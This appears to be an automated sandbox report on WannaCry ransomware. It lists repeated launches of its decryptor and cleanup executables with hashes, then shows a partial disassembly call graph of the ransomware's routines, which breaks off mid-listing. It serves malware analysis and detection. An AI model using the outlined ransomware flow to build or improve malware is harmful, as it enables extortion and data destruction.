                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:159
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:160
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:161
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:162
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:163
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:164
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:165
                                                          Start time:11:59:51
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:166
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:167
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:168
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:169
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:170
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:171
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:172
                                                          Start time:11:59:52
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\dllhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                          Imagebase:0x7ff7d5230000
                                                          File size:21'312 bytes
                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:173
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:174
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:175
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:176
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:177
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:178
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:179
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:180
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:181
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:182
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:183
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:184
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:185
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:186
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:187
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:188
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:189
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:190
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:191
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:192
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:193
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:194
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:195
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:196
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:197
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:198
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:199
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:200
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:201
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:202
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:203
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:204
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:205
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:206
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:207
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:208
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:209
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:210
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:211
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:42.3%
                                                            Dynamic/Decrypted Code Coverage:99.7%
                                                            Signature Coverage:34.5%
                                                            Total number of Nodes:799
                                                            Total number of Limit Nodes:127
                                                            execution_graph 1423 10004f20 swprintf MultiByteToWideChar CopyFileW 1424 10005024 swprintf CopyFileW 1423->1424 1425 10004fba GetUserNameW _wcsicmp 1423->1425 1425->1424 1426 10005013 KiUserCallbackDispatcher 1425->1426 1426->1424 1427 10005340 1428 10005386 fopen 1427->1428 1429 100053dc 1427->1429 1428->1429 1430 1000539f WideCharToMultiByte fprintf fclose 1428->1430 1430->1429 1436 10005ae0 1437 10005b0c 1436->1437 1439 10005d3d 1436->1439 1481 10004690 CreateMutexA 1437->1481 1440 10005b11 1440->1439 1441 10005b19 GetModuleFileNameW wcsrchr 1440->1441 1442 10005b70 SetCurrentDirectoryW 1441->1442 1443 10005b61 wcsrchr 1441->1443 1485 10001000 1442->1485 1443->1442 1445 10005b87 1445->1439 1495 100012d0 1445->1495 1449 10005ba1 1449->1439 1450 10005ba9 sprintf sprintf sprintf 1449->1450 1508 10004600 OpenMutexA 1450->1508 1452 10005be2 1453 10005d42 CreateThread WaitForSingleObject CloseHandle 1452->1453 1516 10004500 sprintf GetFileAttributesA 1452->1516 1453->1439 2218 10004990 31 API calls 1453->2218 1455 10005bf3 1455->1453 1456 10005bfe ??2@YAPAXI 1455->1456 1457 10005c1e 1456->1457 1458 10005c17 1456->1458 1457->1439 1529 10003ac0 1457->1529 1617 10003a10 InitializeCriticalSection 1458->1617 1461 10005c48 1461->1439 1559 100046d0 CreateFileA 1461->1559 1463 10005c61 DeleteFileA 1562 10004420 CryptGenRandom 1463->1562 1464 10005c55 1464->1463 1465 10005c8e 1464->1465 1563 10003bb0 1465->1563 1470 10005cba FindCloseChangeNotification 1471 10005cbd Sleep CreateThread 1470->1471 1472 10005cd7 CloseHandle 1471->1472 1473 10005cda Sleep CreateThread Sleep CreateThread 1471->1473 2186 100045c0 1471->2186 1472->1473 1474 10005d05 FindCloseChangeNotification 1473->1474 1475 10005d08 Sleep CreateThread 1473->1475 2206 10005730 GetLogicalDrives 1473->2206 2212 10005300 1473->2212 1474->1475 1476 10005d21 CloseHandle 1475->1476 1477 10005d24 Sleep 1475->1477 2197 10004990 1475->2197 1476->1477 1570 100057c0 1477->1570 1480 10005d31 WaitForSingleObject CloseHandle 1480->1439 1482 100046c1 1481->1482 1483 100046a6 GetLastError 1481->1483 1482->1440 1483->1482 1484 100046b3 CloseHandle 1483->1484 1484->1440 1486 1000100a fopen 1485->1486 1488 1000102a 1486->1488 1489 1000105f 1486->1489 1490 10001043 fwrite 1488->1490 1491 10001036 fread 1488->1491 1489->1445 1492 1000104e 1490->1492 1491->1492 1493 10001064 fclose 1492->1493 1494 10001056 fclose 1492->1494 1493->1445 1494->1489 1618 100011d0 GetCurrentProcess OpenProcessToken 1495->1618 1497 100012fb 1498 10001303 1497->1498 1499 1000130f GetUserNameW 1497->1499 1500 10001331 _wcsicmp 1498->1500 1499->1500 1501 1000133e 1500->1501 1502 10003410 1501->1502 1634 10004440 1502->1634 1504 10003416 1505 10003427 1504->1505 1506 1000342e LoadLibraryA 1504->1506 1505->1449 1506->1505 1507 10003443 7 API calls 1506->1507 1507->1505 1509 1000461a CloseHandle 1508->1509 1510 1000462b sprintf CreateMutexA 1508->1510 1509->1452 1511 1000467b 1510->1511 1512 1000465d GetLastError 1510->1512 1639 100013e0 6 API calls 1511->1639 1512->1511 1514 1000466a CloseHandle 1512->1514 1514->1452 1515 10004681 1515->1452 1517 100045a2 1516->1517 1518 10004543 GetFileAttributesA 1516->1518 1517->1455 1518->1517 1519 1000454f 1518->1519 1640 10003a10 InitializeCriticalSection 1519->1640 1521 10004558 1641 10003d10 1521->1641 1523 10004573 1524 10004583 1523->1524 1525 1000459d 1523->1525 1657 10003a60 DeleteCriticalSection 1524->1657 1658 10003a60 DeleteCriticalSection 1525->1658 1528 10004588 1528->1455 1530 10003a80 CryptAcquireContextA 1529->1530 1531 10003aca 1530->1531 1532 10003add 